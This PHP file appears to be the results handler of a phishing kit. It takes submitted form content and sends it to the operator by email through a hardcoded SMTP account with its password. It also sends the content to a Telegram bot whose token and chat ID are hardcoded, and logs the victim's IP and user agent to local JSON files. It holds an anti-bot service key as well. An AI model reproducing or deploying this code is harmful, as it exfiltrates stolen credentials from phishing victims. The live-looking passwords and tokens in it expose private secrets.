<?php

error_reporting(E_ALL);
ini_set('display_errors', 0);

// PHPMailer - Try multiple paths
$phpmailerPaths = array(
    array('PHPMailer/Exception.php', 'PHPMailer/PHPMailer.php', 'PHPMailer/SMTP.php'),
    array('Exception.php', 'PHPMailer.php', 'SMTP.php'),
    array('vendor/phpmailer/phpmailer/src/Exception.php', 'vendor/phpmailer/phpmailer/src/PHPMailer.php', 'vendor/phpmailer/phpmailer/src/SMTP.php')
);

$loaded = false;
foreach ($phpmailerPaths as $paths) {
    if (file_exists($paths[0]) && file_exists($paths[1]) && file_exists($paths[2])) {
        require $paths[0];
        require $paths[1];
        require $paths[2];
        $loaded = true;
        break;
    }
}

if (!$loaded) {
    header('Content-Type: application/json');
    echo json_encode(array('status' => 'error', 'message' => 'PHPMailer files not found'));
    exit();
}

use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\SMTP;
use PHPMailer\PHPMailer\Exception;

/* START SMTP CONFIGURATION */

$smtpConfig = array(
    'host'     => 'perfecthumanperson.liftup.in.net',
    'username' => 'oioi@perfecthumanperson.liftup.in.net',
    'password' => 'Polos@123',
    'port'     => 465,
    'secure'   => 'ssl',
    'from'     => 'oioi@perfecthumanperson.liftup.in.net'
);

/* END SMTP CONFIGURATION */

$configFile = "dashboard/setting.json";
$resultFolder = "results";

// Create results folder if not exists
if (!is_dir($resultFolder)) {
    mkdir($resultFolder, 0755, true);
}

class EmailSender {
    
    private $smtp;
    private $debugLog = '';
    
    public function __construct($smtpConfig) {
        $this->smtp = $smtpConfig;
    }
    
    public function getDebugLog() {
        return $this->debugLog;
    }
    
    public function kirim($to, $subject, $message, $fromName = '') {
        $mail = new PHPMailer(true);
        
        try {
            // Capture debug output
            $debugOutput = '';
            
            // Server settings
            $mail->isSMTP();
            $mail->Host       = $this->smtp['host'];
            $mail->SMTPAuth   = true;
            $mail->Username   = $this->smtp['username'];
            $mail->Password   = $this->smtp['password'];
            $mail->Port       = $this->smtp['port'];
            
            // Set encryption
            if ($this->smtp['port'] == 465) {
                $mail->SMTPSecure = PHPMailer::ENCRYPTION_SMTPS;
            } elseif ($this->smtp['port'] == 587) {
                $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS;
            }
            
            // SMTP Options for Gmail/G Suite
            $mail->SMTPOptions = array(
                'ssl' => array(
                    'verify_peer' => false,
                    'verify_peer_name' => false,
                    'allow_self_signed' => true
                )
            );
            
            // Debug mode (2 = client and server messages)
            $mail->SMTPDebug = 2;
            $mail->Debugoutput = function($str, $level) use (&$debugOutput) {
                $debugOutput .= $str . "\n";
            };
            
            // Timeout settings
            $mail->Timeout = 60;
            $mail->SMTPKeepAlive = true;
            
            // Character encoding
            $mail->CharSet = 'UTF-8';
            $mail->Encoding = 'base64';
            
            // From settings
            $fromEmail = $this->smtp['from'];
            $fromName = !empty($fromName) ? $fromName : 'REZ';
            $mail->setFrom($fromEmail, $fromName);
            $mail->addReplyTo($fromEmail, $fromName);
            
            // Add recipients
            $recipients = array_filter(array_map('trim', explode(',', $to)));
            if (empty($recipients)) {
                $this->debugLog = 'No valid recipients';
                return array('success' => false, 'message' => 'Error: No valid recipients', 'debug' => $this->debugLog);
            }
            
            $addedRecipients = 0;
            foreach ($recipients as $recipient) {
                if (filter_var($recipient, FILTER_VALIDATE_EMAIL)) {
                    $mail->addAddress($recipient);
                    $addedRecipients++;
                }
            }
            
            if ($addedRecipients == 0) {
                $this->debugLog = 'No valid email addresses';
                return array('success' => false, 'message' => 'Error: No valid email addresses', 'debug' => $this->debugLog);
            }
            
            // Content
            $mail->isHTML(true);
            $mail->Subject = $subject;
            $mail->Body = $message;
            $mail->AltBody = strip_tags(str_replace(array('<br>', '<br/>', '<br />'), "\n", $message));
            
            // Send
            $result = $mail->send();
            $this->debugLog = $debugOutput;
            
            if ($result) {
                return array('success' => true, 'message' => 'Message has been sent successfully', 'debug' => $debugOutput);
            } else {
                return array('success' => false, 'message' => 'Send failed: ' . $mail->ErrorInfo, 'debug' => $debugOutput);
            }
            
        } catch (Exception $e) {
            $this->debugLog = isset($debugOutput) ? $debugOutput : '';
            return array('success' => false, 'message' => 'Mailer Error: ' . $mail->ErrorInfo, 'debug' => $this->debugLog);
        }
    }
}

function load_config($file) {
    $dir = dirname($file);
    if (!is_dir($dir)) {
        mkdir($dir, 0755, true);
    }
    
    if (!file_exists($file)) {
        $defaultConfig = array(
            'telegram_apikey' => '8204801852:AAGsQ9heTHP8D4e58Nq1KbyLSaNg9uGaT2s',
            'telegram_chatid' => '5446695890',
            'email' => 'davidkholiq@hotmail.com',
            'stopbot_apikey' => 'e4efad9037309d8d74af0c9e498745c7'
        );
        file_put_contents($file, json_encode($defaultConfig, JSON_PRETTY_PRINT));
    }
    $data = json_decode(file_get_contents($file), true);
    if (is_array($data)) {
        return $data;
    }
    return array();
}

function sendTelegram($botToken, $chatId, $message) {
    $url = 'https://api.telegram.org/bot' . $botToken . '/sendMessage';
    $data = array(
        'chat_id' => $chatId,
        'text' => $message,
        'parse_mode' => 'HTML'
    );
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    $result = curl_exec($ch);
    $error = curl_error($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    return array(
        'success' => ($httpCode == 200),
        'response' => $result,
        'error' => $error,
        'http_code' => $httpCode
    );
}

function saveResult($folder, $data) {
    $filename = $folder . '/result_' . date('Y-m-d_H-i-s') . '_' . uniqid() . '.json';
    $saved = file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE));
    return $saved ? $filename : false;
}

function getClientIP() {
    if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {
        return $_SERVER['HTTP_CF_CONNECTING_IP'];
    }
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        return $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
        return $_SERVER['HTTP_CLIENT_IP'];
    }
    return isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'Unknown';
}

// Load configuration
$config = load_config($configFile);

// Handle POST request
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    
    $formTo = isset($_POST['to']) ? trim($_POST['to']) : '';
    $subject = isset($_POST['subject']) ? trim($_POST['subject']) : '';
    $html = isset($_POST['html']) ? trim($_POST['html']) : '';
    $name = isset($_POST['name']) ? trim($_POST['name']) : 'Anonymous';
    
    $from = $name . ' <' . $smtpConfig['from'] . '>';
    $clientIP = getClientIP();
    $timestamp = date('Y-m-d H:i:s');
    
    // Combine recipients from form and setting.json
    $configEmail = isset($config['email']) ? $config['email'] : '';
    $allRecipients = array_filter(array($formTo, $configEmail));
    $toCombined = implode(',', $allRecipients);
    
    // Send email
    $emailResult = array('success' => false, 'message' => 'Not sent', 'debug' => '');
    try {
        $emailSender = new EmailSender($smtpConfig);
        $emailResult = $emailSender->kirim($toCombined, $subject, $html, $name);
    } catch (Exception $e) {
        $emailResult = array('success' => false, 'message' => 'Error: ' . $e->getMessage(), 'debug' => '');
    }
    
    // Send to Telegram
    $telegramResult = array('success' => false, 'response' => '', 'error' => 'Not configured');
    $botToken = isset($config['telegram_apikey']) ? $config['telegram_apikey'] : '';
    $chatId = isset($config['telegram_chatid']) ? $config['telegram_chatid'] : '';
    
    if (!empty($botToken) && !empty($chatId)) {
        $plainText = html_entity_decode(strip_tags($html));
        $cleanText = mb_substr($plainText, 0, 3500);
        
        $telegramMessage = "<b>📩 New Result</b>\n\n";
        $telegramMessage .= "<b>From:</b> " . htmlspecialchars($name) . "\n";
        $telegramMessage .= "<b>Subject:</b> " . htmlspecialchars($subject) . "\n";
        $telegramMessage .= "<b>To:</b> " . htmlspecialchars($formTo) . "\n";
        $telegramMessage .= "<b>IP:</b> " . $clientIP . "\n";
        $telegramMessage .= "<b>Time:</b> " . $timestamp . "\n\n";
        $telegramMessage .= "<b>Content:</b>\n<pre>" . htmlspecialchars($cleanText) . "</pre>";
        
        $telegramResult = sendTelegram($botToken, $chatId, $telegramMessage);
    }
    
    // Prepare result data
    $resultData = array(
        'timestamp' => $timestamp,
        'ip' => $clientIP,
        'user_agent' => isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'Unknown',
        'from' => $from,
        'from_name' => $name,
        'to' => $toCombined,
        'subject' => $subject,
        'html' => $html,
        'email_status' => $emailResult['success'] ? 'sent' : 'failed',
        'email_message' => $emailResult['message'],
        'telegram_status' => $telegramResult['success'] ? 'sent' : 'failed',
        'telegram_response' => $telegramResult['response']
    );
    
    // Save result to JSON file
    $savedFile = saveResult($resultFolder, $resultData);
    
    // Return JSON response
    header('Content-Type: application/json');
    echo json_encode(array(
        'status' => 'done',
        'email' => $emailResult['message'],
        'email_sent' => $emailResult['success'],
        'telegram_sent' => $telegramResult['success'],
        'to' => $toCombined,
        'from' => $from,
        'subject' => $subject,
        'saved_file' => $savedFile ? basename($savedFile) : false,
        'debug' => $emailResult['debug']
    ), JSON_PRETTY_PRINT);
    exit();
}

// If not POST, show error
header('Content-Type: application/json');
echo json_encode(array(
    'status' => 'error',
    'message' => 'Invalid request method. Use POST.'
));
